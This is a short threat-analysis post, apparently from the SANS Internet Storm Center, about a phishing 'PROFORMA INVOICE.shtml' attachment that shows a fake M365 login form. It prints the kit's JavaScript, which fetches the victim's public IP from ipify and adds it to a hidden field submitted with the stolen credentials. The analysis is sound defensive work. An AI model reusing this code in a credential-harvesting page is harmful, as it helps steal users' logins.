While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called “PROFORMA INVOICE.shtml”. Right now, nothing special, emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:
The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:
This means that a variable called “ip” will be submitted to the form simultaneously with the credentials. While checking deeper, there was some obfuscated JavaScript code below in the code:
const getip = async () => {
const payl = await postData("https://api.ipify.org/?format=json", {}, "GET");
document.getElementById("hIP").value = payl.ip;
return payl.ip;
}
getip();
async function postData(url = '', data = {}, method="POST") {
const response = await fetch(url, {
method,
mode: 'cors',
cache: 'no-cache',
headers: {
'Content-Type': 'application/json'
},
body: (method.toLowerCase() === "post") ? JSON.stringify(data) : null
});
return response.json(); // parses JSON response into native JavaScript objects
}
The line in red assigns the victim’s public IP address to hIP that will be exfiltrated with the credentials.
Note that this piece of JavaScript is a perfect example of how to contact an API and extract data from the JSON response!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
